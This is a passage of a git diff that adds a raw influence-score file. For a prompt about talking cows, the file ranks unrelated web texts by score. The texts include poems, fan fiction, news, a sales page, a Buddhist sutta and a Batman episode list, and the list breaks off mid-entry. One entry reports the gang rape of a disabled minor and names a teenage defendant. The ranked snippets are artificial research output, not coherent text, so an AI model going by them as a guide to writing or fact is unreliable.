Moore, who admitted he watches "more television programs on my iPod than on regular TV." The new fund will also support documentaries and variety and performing arts programming that can demonstrate that the market alone would not support their creation. "The realigned fund will favour projects produced in high definition and those that have achieved and demonstrated the most potential to achieve success, in terms of audience and return on investment," Moore said "Applicants will be required to make their projects available across a minimum of two distribution platforms, including television." The establishment of the new fund is a clear rejection of last summer's recommendation by the broadcasting industry czar, the Canadian Radio-television Telecommunications Commission, that the $300-million Canadian Television Fund be split into two funding streams, one for private networks, the other for non-profit broadcasters.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> \ No newline at end of file +B) \ No newline at end of file diff --git a/examples/openwebtext/files/scores_raw/cow.txt b/examples/openwebtext/files/scores_raw/cow.txt new file mode 100644 index 0000000..4d0b613 --- /dev/null +++ b/examples/openwebtext/files/scores_raw/cow.txt @@ -0,0 +1,2330 @@ +Query Sequence: +Prompt:If cows could suddenly speak, their first words would probably be:; Completion: 'I am hungry.' + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 2424832.0 +<|begin_of_text|>Autoplay next video + +The neighbors' dog will not stop barking. + +He is barking the same high, rhythmic bark + +that he barks every time they leave the house. + +They must switch him on on their way out. + +The neighbors' dog will not stop barking. + +I close all the windows in the house + +and put on a Beethoven symphony full blast + +but I can still hear him muffled under the music, + +barking, barking, barking, + +and now I can see him sitting in the orchestra, + +his head raised confidently as if Beethoven + +had included a part for barking dog. + +When the record finally ends he is still barking, + +sitting there in the oboe section barking, + +his eyes fixed on the conductor who is + +entreating him with his baton + +while the other musicians listen in respectful + +silence to the famous barking dog solo, + +that endless coda that first established + +Beethoven as an innovative genius.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 1; Score = 1966080.0 +<|begin_of_text|>Tear Droplet: Just a quick intro from yours truly, the author. I know I haven't updated any my fanfiction in ages and yet I'm starting a new one. I just felt like I wanted to upload something new. I have a bunch of ideas to type out and no motivation to type. I'm amazed I was even able to type this (even though it was short). I don't have this story sorted out yet. I only have the ending in my head lol…There shouldn't be too many grammatical errors either since I was able to do a mini read through cause it was short. + +Enjoy ;). One of my favorite Pretty Cure couples. + +Prologue: The end of King Jikochu + +And that was it. Cure Heart's last move, My Sweet Heart, defeated Proto Jikochu as well as cleansing all the selfish psyches that were in him. Bel, after being overrun by King Jikochu's power and likewise being defeated, was weakened into the state of a mouse. Marmo, discovering his pathetic state, picked him up by his tail and sighed. "Look at you" she said. + +"How pathetic" Ira commented. + +"Whatever, I'll just sleep for 10,000 years again to build up my energy" Bel replied. + +"Huh!? Another 10,000 years!?" Ira exclaimed. He turned to face where the Cures were sitting in the far distance. + +"Oh well" he said as he started particularly at a blue haired girl laughing away. "They're still here." + +"What are you doing?" Marmo asked bringing Ira back to reality. "Let's go" she said softy. + +"I know" he replied. He got up and started to float towards Marmo who was flying away. + +"I'm hungry" Bel commented. + +"Just eat some leftovers" Ira replied as they all teleported away, back to their hideout. + +'It's okay' Ira thought to himself as the teleportation started to bring them back. 'This was inevitable in the end.' + +... + +The three returned back to their hideout, the bowling alley. The hideout was their own dimension of space; only connecting to Trump Kingdom when they wanted. Now that Trump Kingdom was freed from King Jikochu's control, it wasn't safe for them to have it conveniently accessed by the citizens so they broke the connection. + +Marmo immediately released Bel's tail when they returned. Being in his mouse form, Bel was able +================================================================================ +Rank = 2; Score = 1851392.0 +<|begin_of_text|>In 2008, the world’s media was captivated by a study apparently showing that cows like to align themselves with magnetic fields. But attempts to replicate this finding have left two groups of researchers at loggerheads, highlighting the problems faced by scientists working to replicate unusual findings based on new methods of data analysis. + +Magneto-reception has been detected in animals from turtles to birds. Three years ago, Hynek Burda, a zoologist at the University of Duisburg-Essen, Germany, and his colleagues added cattle to the magnetic family with a paper in Proceedings of the National Academy of Sciences. The team used data from Google Earth to show that domestic cattle seem to prefer to align their bodies along Earth’s magnetic field lines1, and showed a similar phenomenon in field observations of deer. + +E. ELISSEEVA/GLOWIMAGES.COM + +A follow-up study by Burda and his colleagues showed no such alignment near electric power lines, which might be expected to disrupt magneto-sensing in cattle2. + +Cow conundrum + +Earlier this year, a group of Czech researchers reported their failed attempt to replicate the finding using different Google Earth images3. The Czech team wrote in the Journal of Comparative Physiology A: “Two independent groups participated in our study and came to the same conclusion that in contradiction to the recent findings of other researchers, no alignment of the animals and of their herds along geomagnetic field lines could be found.” + +“When in 2008 the authors started to announce their surprising findings in [the] mass media, we got the impression that this is not the way science should be made and we took a closer look. We found out that it is not as fantastic as it was presented,” says Lukas Jelinek, a researcher in the electromagnetic-field department at the Czech Technical University in Prague and one of the authors of the replication attempt. + +In response, Burda and his colleagues reanalysed the replication attempt by Jelinek and his colleagues4. Burda says that half of the Jelinek team's data should be excluded because some of the pastures are on slopes or near high-voltage power lines, for example, or because the images are too poor to make out cattle, or appear to contain hay bales or sheep instead. “One half of their data is just noise,” says Burda. + +In addition, Burda's group looked at herds as a whole, whereas Jelinek’s team analysed individual cows. “Of the data that were useable, they looked only at +================================================================================ +Rank = 3; Score = 1777664.0 +<|begin_of_text|>At Pampered Piglets each of our teacup piglets are raised inside of our house. They are brought up to be comfortable around children and other pets. Unlike some other websites offering teacup pigs We do not broker out other piglets!!!! + +Be very careful when it comes to buying a teacup pig. There are several breeders pretending to have teacup pigs for sale when they are really just selling pot belly pigs. + +If you are finding "Teacup pigs" for under $1,000 dollars they most likely are just pot belly pigs. Which will grow to 150 LBS or more!! + +Teacup piglets each have their very own unique personality. Some like to be very bossy and feisty, some like to be very sweet and cuddly. They love to have their bellies rubbed and love to rub their little piggy nose on things. They grow more comfortable the more they get to know you and usually will have a favorite that they seem to love the most. + +The Teacup piglet’s tail will waggle when they are happy or excited. They love treats! They usually will squeal when they need to go to the bathroom. They are surprisingly litter box trained at just a few days old and tend to be cleaner pets than cats or dogs. They recognize their own name just weeks after they are born and love to follow you around. + +Teacup pigs are extremely playful and will get along with other pets very well. The teacup piglets are able to jump a couple feet in the air with their short little stubby legs even though they are just a few inches tall. They love to cuddle under blankets and tend to be a little ornery when they are hungry or tired. + +We will ship your teacup pig to you no matter where you live. Each teacup pig comes with a guarantee that the piglet is healthy.. + +The teacup pigs can be bottle fed at 2 weeks old. They love their milk and will stretch out and gulp down their bottle of milk. + +Teacup piglets can range in price from $1,500 and up. Prices vary depending on size, color, and gender. + +You will be extra pleased with how friendly and loving your teacup pig is. They will brighten up your day!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 4; Score = 1744896.0 +<|begin_of_text|>$\begingroup$ + +Sam sat with his eyes closed for several minutes, then said softly: + +"I have many names, and none of them matter." He opened his eyes slightly then, but he did not move his head. He looked upon nothing in particular. + +"Names are not important," he said. "To speak is to name names, but to speak is not important. A thing happens once that has never happened before. Seeing it, a man looks on reality. He cannot tell others what he has seen. Others wish to know, however, so they question him saying, 'What is it like, this thing you have seen?' So he tries to tell them. Perhaps he has seen the very first fire in the world. He tells them, 'It is red, like a poppy, but through it dance other colors. It has no form, like water, flowing everywhere. It is warm, like the sun of summer, only warmer. It exists for a time on a piece of wood, and then the wood is gone, as though it were eaten, leaving behind that which is black and can be sifted like sand. When the wood is gone, it too is gone.' Therefore, the hearers must think reality is like a poppy, like water, like the sun, like that which eats and excretes. They think it is like to anything that they are told it is like by the man who has known it. But they have not looked upon fire. They cannot really know it. They can only know of it. But fire comes again into the world, many times. More men look upon fire. After a time, fire is as common as grass and clouds and the air they breathe. They see that, while it is like a poppy, it is not a poppy, while it is like water, it is not water, while it is like the sun, it is not the sun, and while it is like that which eats and passes wastes, it is not that which eats and passes wastes, but something different from each of these apart or all of these together. So they look upon this new thing and they make a new word to call it. They call it 'fire.' + +"If they come upon one who still has not seen it and they speak to him of fire, he does not know what they mean. So they, in turn, fall back upon telling him what fire is like. As they do, they know from their own experience that what they are telling him is +================================================================================ +Rank = 5; Score = 1720320.0 +<|begin_of_text|>But what happens if ambition fails to counteract ambition? What happens if stability fails to assert itself in the face of chaos and instability? If decency fails to call out indecency? Were the shoe on the other foot, we Republicans—would we Republicans—meekly accept such behavior on display from dominant Democrats? Of course we wouldn’t, and we would be wrong if we did. + +When we remain silent and fail to act when we know that that silence and inaction is the wrong thing to do—because of political considerations, because we might make enemies, because we might alienate the base, because we might provoke a primary challenge, because ad infinitum, ad nauseum—when we succumb to those considerations in spite of what should be greater considerations and imperatives in defense of the institutions and our liberty, we dishonor our principles and forsake our obligations. Those things are far more important than politics. + +Now, I am aware that more politically savvy people than I will caution against such talk. I am aware that a segment of my party believes that anything short of complete and unquestioning loyalty to a president who belongs to my party is unacceptable and suspect. + +If I have been critical, it is not because I relish criticizing the behavior of the president of the United States. If I have been critical, it is because I believe it is my obligation to do so, and as a matter of duty of conscience. The notion that one should stay silent as the norms and values that keep America strong are undermined and as the alliances and agreements that ensure the stability of the entire world are routinely threatened by the level of thought that goes into 140 characters—the notion that we should say and do nothing in the face of such mercurial behavior is ahistoric and, I believe, profoundly misguided. + +A president—a Republican president—named Roosevelt had this to say about the president and a citizen’s relationship to the office: + +“The President is merely the most important among a large number of public servants. He should be supported or opposed exactly to the degree which is warranted by his good conduct or bad conduct, his efficiency or inefficiency in rendering loyal, able, and disinterested service to the nation as a whole.” He continued, “Therefore, it is absolutely necessary that there should be full liberty to tell the truth about his acts, and this means that it is exactly as necessary to blame him when he does wrong as to praise him when he does right. Any other attitude in an American citizen is both base and servile.” President Roosevelt +================================================================================ +Rank = 6; Score = 1654784.0 +<|begin_of_text|>You may have heard that diets don’t work, but you may not fully understand why. After all, most people can eat less and move more and will lose weight! + +It’s true, short-term weight loss is possible for most people. However, after the body loses a certain amount of weight, a variety of compensatory mechanisms kick into high gear to restore us to what is known as our “set point weight”. Our set point weight is actually a range of 15-20 pounds where each individual’s body feels happiest, and it occurs when you eat intuitively, when you are hungry, and according to your signals of hunger and fullness. + +Essentially, as we lose weight, our body realizes, “whoa, I’m starving!” and it does everything it can to gain weight to the point where it feels comfortable again. Just like our bodies maintain homeostasis with regard to things like our internal temperature, they also like to maintain our weight. + +1 Our bodies fight against us the moment they see our weight shift significantly lower. These weight loss-induced compensatory mechanisms, which are orchestrated by a part of our brain known as the hypothalamus, are the reason why in a major meta-analysis of dieting studies, the average amount of weight lost was a mere 0.9 kg.Our bodies fight against us the moment they see our weight shift significantly lower. + +2 (It’s also valuable to note that the average weight lost in dieting studies is likely artificially high, due to most weight loss studies having major design flaws. Factors in this include subject selection biases, people dropping out due to the shame of weight gain, poor data gathering, and people going on multiple diets in succession!) + +Read on to understand each of them in more detail. + +When you diet to lose weight… + +1) Your brain notices food more. 3 Kinda cruel, isn’t it? But it’s true: when you are depriving yourself of food, your brain actually starts to notice food more. Not only that — your brain pays more attention to the food when it comes across it. This is all done by the amazing hypothalamus and a variety of hormones. + +2) Your tastes change so more foods are appealing. Dieting even leads to our hypothalamus to change the way we perceive tastes so a wider variety of food is appealing. 4 It can also make you want high fat food more, because fat contains more calories than other macronutrients. + +3) Your appetite increases & you feel less satiated when you eat. +================================================================================ +Rank = 7; Score = 1646592.0 +<|begin_of_text|>Editor's Note: Follow live blogging on "This Just In" and the latest tweets from CNN correspondents from the protests. Send your video, images to CNN iReport. + +Cairo, Egypt (CNN) -- Egyptians on Saturday cleared burned cars, garbage and debris that accumulated over 18 days at Tahrir Square, a sign that Cairo and the rest of the country were ready to rebuild and get back to work while the country formulates a plan for governance. + +A day after President Hosni Mubarak stepped down, employees and businesses readied themselves for Sunday, the traditional start of the work week. The country's stock market is expected to reopen Wednesday. + +Wael Ghonim, a cyberactivist who is a Google executive on leave, wrote Friday on his Twitter account, "Dear Egyptians, Go back to your work on Sunday, work like never before and help Egypt become a developed country." + +Volunteers repainted black-and-white-striped street curbs around a monument by the Egyptian Museum, which had been on the front line in street battles between Mubarak's foes and supporters. Police were starting to move barricades and trying to restore vehicle traffic at Tahrir Square, where many protesters vowed to remain. + +"It's time to start rebuilding the country," protester Yehya Kheireldin said, pointing to the hundreds of volunteers armed with brooms who are sweeping away the debris left by the sit-in. + +In the immediate future, the military -- largely respected by Egyptians -- will have to grapple with guiding the country of more than 80 million people through the transition amid massive problems of unemployment and considerable economic underdevelopment, said CNN correspondent Ben Wedeman, who is based in Cairo. + +Former Egyptian Trade Minister Rachid Mohammed Rachid recently told CNN that the new government must show it is business-friendly. + +The African nation virtually shut down during the unrest, losing vital tourism dollars as well. + +CNN's Nic Robertson reported Saturday that citizens who make their living off foreign tourists are angry. + +"Young boys 17 years old and 18 years old, they want to say, 'We are hungry, we want to eat, we want to work,' " said businessman Ayman el Myonir. + +Businessmen near the famed Pyramids say about 50,000 people are employed in the tourism industry, Robertson reported. + +"We try to help each other. We would like to put our hands together, and to help each other," said el Myonir. + +As thousands reveled in their improbable revolution, the nation's newly +================================================================================ +Rank = 8; Score = 1507328.0 +<|begin_of_text|>At some point in my daughter’s life, when she’s old enough to avoid being traumatized by the thought of her parents’ sex life (if that’s even possible), I’ll point to a beer bottle and say, “That helped me make you.” + +If nature and nurture have worked their magic, she’ll laugh. And then I’ll tell this tale. + +My wife and I married in August 2011. We were each 33, an age when last calls are less important than waking up for work. We were two peas in a pod, ready for a third. In your thirties, making a baby is not as simple as throwing a fifth of Beam in the backseat of a car, removing your pants, and taking a ride to kingdom come. Time was required. Months disappeared. Our spirits lagged, beleaguered by one negative pregnancy test after another. After trying for some time, copulation becomes obligation. Beer helps. Oh, does it help. + +One morning, after drinking myself into a state of disrepair, I awoke to a scream. Our dog barked bloody murder. “We’re pregnant!” my wife shouted, her words bringing pain and pleasure. Nine months later our daughter, Violet, debuted. + +Alcohol is not an ideal coping technique. But damn, does a beer feel mighty good after changing a diaper. + +To celebrate, I drank a Sierra Nevada Celebration. It was not the last one I drank in my daughter’s presence. + +Having a child does not bathe your life in rainbows and magic-hour sunlight. After two days in the hospital (if that long!), you’re sent home with a wailing infant and simple instructions: Don’t shake the baby. You wonder why the nurses repeat that command, over and over…until your child will not stop screaming, and then you get it. You want to shake the baby. A million dollars to stop screaming! But you do not shake the baby. Instead, you soothe her and calmly drink beer. + +Well, at least I drink beer. As a beer journalist and author, I have a built-in excuse. Research. It’s always for research, no matter if I have a deadline or a howling daughter. The howls. They are for several very good reasons. My daughter is hungry. She has a dirty diaper. She wants to be held. She’s tired. She doesn’t like that thing, which it is our job as parents to deduce, Sherlock-style. + +Therapists, I hear you +================================================================================ +Rank = 9; Score = 1335296.0 +<|begin_of_text|>I have heard that on one occasion the Blessed One was staying near Rājagaha at the Bamboo Grove, the Squirrels' Sanctuary. And on that occasion Ven. Sāriputta and Ven. Mahā Moggallāna were staying in Pigeon Cave. Then, on a moonlit night, Ven. Sāriputta — his head newly shaven — was sitting in the open air, having attained a certain level of concentration. + +And on that occasion two yakkhas who were companions were flying from north to south on some business or other. They saw Ven. Sāriputta — his head newly shaven — sitting in the open air. Seeing him, the first yakkha said to the second, "I'm inspired to give this contemplative a blow on the head." + +When this was said, the second yakkha said to the first, "Enough of that, my good friend. Don't lay a hand on the contemplative. He's an outstanding contemplative, of great power & great might." + +A second time, the first yakkha said to the second, "I'm inspired to give this contemplative a blow on the head." + +A second time, the second yakkha said to the first, "Enough of that, my good friend. Don't lay a hand on the contemplative. He's an outstanding contemplative, of great power & great might." + +A third time, the first yakkha said to the second, "I'm inspired to give this contemplative a blow on the head." + +A third time, the second yakkha said to the first, "Enough of that, my good friend. Don't lay a hand on the contemplative. He's an outstanding contemplative, of great power & great might." + +Then the first yakkha, ignoring the second yakkha, gave Ven. Sāriputta a blow on the head. And with that blow he might have knocked over an elephant seven or eight cubits tall, or split a great rocky crag. But right there the yakkha — yelling, "I'm burning!" — fell into the Great Hell. + +Now, Ven. Moggallāna — with his divine eye, pure and surpassing the human — saw the yakkha give Ven. Sāriputta a blow on the head. Seeing this, he went to Ven. Sāriputta and, on arrival, said to him, "I hope +================================================================================ +Rank = 10; Score = 1327104.0 +<|begin_of_text|>© Unknown + +It's understandable, as people always like to take a stand, but it's not understandable why you take their side - the children on Israel side are bleeding just the same. It's true that in terms of numbers, more people suffer on their side. It's a simple matter of population density, human shield factors, and fire power. Don't mistake me, I feel sorry for them. I just feel more sorry for my family, my neighbours and friends and country first. It seems you don't. + +© Unknown + +"The renowned Israeli historian revisits the formative period of the State of Israel. Between 1947 and 1949, over 400 Palestinian villages were deliberately destroyed, civilians were massacred, and around a million men, women, and children were expelled from their homes at gunpoint. Denied for almost six decades, had it happened today it could only have been called "ethnic cleansing". Decisively debunking the myth that the Palestinian population left of their own accord in the course of this war, Ilan Pappe offers impressive archival evidence to demonstrate that, from its very inception, a central plank in Israel's founding ideology was the forcible removal of the indigenous population. This book is indispensable for anyone interested in the Middle East." + +"If I knew it was possible to save all the children in Germany by taking them to England, and only half of the children by taking them to Eretz Israel, I would choose the second solution. For we must take into account not only the lives of these children but also the history of the people of Israel." + +Source: Yvon Gelbner, "Zionist policy and the fate of European Jewry", in Yad Vashem studies (Jerusalem, vol. XII), p. 199. + +"The saving of the Jews in Europe did not figure at the head of the list of priorities of the ruling class. It was the foundation of the State which was primordial in their eyes." + +Source: Tom Segev, "Le septième million", Ed. Liana Levi (Paris, 1993), p. 539. + +© Unknown + +© Unknown + +I am ashamed to be an Israeli. There, I said it. And yes, I know better than most that theremany good and kind people in Israel. But what is happening right now in Gaza in the name of those good people CANNOT be tolerated, because it goes against everything humane and decent.Yes, there are deaths on the Israeli side as well, but despite the heart +================================================================================ +Rank = 11; Score = 1310720.0 +<|begin_of_text|>CLARK COUNTY, NV (The Las Vegas Review-Journal) – A 15-year-old boy charged in the gang rape of a 14-year-old special education student will be prosecuted in the adult justice system, a Clark County Family Court judge ruled Wednesday. + +The teen, Leby Urquilla, is one of four boys charged, and the only juvenile to be certified as an adult as of Wednesday. Two adults are also jailed in connection with the case: Jose Mejia-Henriquez, 18, and the boy’s father, Leby Alas-Gomez, 39. + +The victim, who has the mental capacity of a 7- or 8-year-old, told police she was sexually assaulted by at least six males on three separate occasions in November. The accusations came to light after a video depicting the girl being used in group sex acts began circulating around Del Sol Academy in December. + +“They treated this special needs girl like a piece of cattle or property, to do with what they wanted,” Chief Deputy District Attorney Kimberly Adams said Wednesday in a small juvenile courtroom. + +She called the acts “heinous and egregious” while arguing for Urquilla to be tried as an adult. + +Urquilla sat silently as a court interpreter translated Adams’ words into Spanish, often looking down at his lap, then at the judge. + +A key piece of evidence — one of the videos shared throughout the high school — captured part of one gang rape incident, Adams said. + +In the footage, the girl can be seen trying to get up while being sexually assaulted, but “they would push her back down,” Adams said. + +“She repeatedly said to stop, but they don’t,” she said. “She tries to cross her legs while on her stomach, but (Urquilla) separates them.” + +The victim was not at the hearing Wednesday, but her mother wiped away a tear as Adams continued, describing Urquilla as a calculated predator and the girl as “one of the most vulnerable victims of our society.” + +“It appears she was used and groomed by (Urquilla),” Adams said. The girl initially liked Urquilla and wanted to fit in; she often ate lunch with the boys at school. But the relationship was about control, Adams argued. + +“If he said he was hungry, she would give him her lunch,” she said. “Eventually (Urquilla) began to invite (the victim) to his apartment, and initially, she would say no. And then, after several times, she finally said OK.” + +Public +================================================================================ +Rank = 12; Score = 1269760.0 +<|begin_of_text|>Click to email this to a friend (Opens in new window) + +Hard-partying Andy Dick vowed to stay sober during his recent stint on “Dancing With the Stars.” But once the comic was eliminated, it seems all bets were off. + +Dick was partying his way through the Hamptons last weekend, sources said, and even took one poor soul who tried to help him on a wild escapade. + +We’re told Dick was at a bash in East Hampton Friday looking “incredibly intoxicated.” When a friend he’d arrived with disappeared, a spy saw the former “NewsRadio” star visibly “upset.” + +“He didn’t know where he was staying,” our source explained. “He had no cellphone or wallet.” A woman offered to take Dick to her place — “Big mistake,” she told us, adding that on the way, Dick “grabbed the steering wheel” as she drove, and blasted her radio. + +But things were about to get much worse. “When we got to the house, [Andy] told my husband he was hungry,” the good Samaritan told us. “My husband made him eggs. [But] Andy spat at me because I could not put a song he requested on my iPod quickly enough. He kept asking... if I was a moron.” + +Then, “He grabbed my breast and said, ‘You’re so hot. I would [bleep] the [bleep] out of you!” When his advances were rebuked, openly bisexual Dick grabbed the crotch of the woman’s husband and tried to kiss him, she said. + +The couple told Dick to sleep it off for a few hours. When the exasperated wife took him back to the party to see if he could find his friend, he grabbed beers from her fridge to drink on the way, despite her objections. When she dropped him off, “He asked me if he could borrow 20 bucks!” She didn’t hand over any dough. “He is a tortured soul,” she said. + +Spies saw Dick the next day at Surf Lodge crashing a Beach magazine party, peeing in a bush at the swanky spot and being asked to leave. + +Dick’s most recent rehab stint was last year, when the staff of “Andy Dick Live!” staged an intervention. His reps did not respond to repeated requests for comment.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 13; Score = 1228800.0 +<|begin_of_text|>No. in + +series No. in + +season Title Directed by Written by Original air date Villain(s) + +A mysterious bat-like creature terrorizes Gotham City, causing the police force to pursue Batman. The Dark Knight must find the real perpetrator to clear his name. + +After escaping Arkham Asylum on Christmas Eve, the Joker takes over Gotham's airwaves and terrorizes the city for a crime. He challenges Batman and Robin to find his hidden TV studio and free his hostages – Commissioner Gordon, Detective Bullock and Summer Gleeson – before midnight. + +Batman encounters the Scarecrow and attempts to foil his scheme to burn down Gotham University, but in the process is exposed to the Scarecrow's fear gas, and is forced to face his own guilt over the death of his parents. Note: This episode introduced the popular line "I am vengeance. I am the night. I am Batman!"[1] + +4 4 "The Last Laugh" Kevin Altieri Carl Swenson September 22, 1992 ( ) The Joker + +The Joker covers Gotham City in a cloud of laughing gas and begins plundering the crazed city. But after Alfred is infected with the toxin, Batman has added incentive to stop the Joker and acquire an antidote from him before all of Gotham dies with a smile. + +When District Attorney Harvey Dent collapses after a meal with his fiancée Pamela Isley and friend Bruce Wayne, doctors discover that he has been poisoned. Batman must find the culprit and the antidote before the DA's time runs out. + +6 6 "The Underdwellers" Frank Paur Story by : Tom Ruegger + +Teleplay by : Jules Dennis and Richard Mueller October 21, 1992 ( ) Sewer King + +Batman traces a series of bizarre robberies on the streets of Gotham back to a band of homeless children, who have been raised to do the bidding of their master, the Sewer King. + +7 7 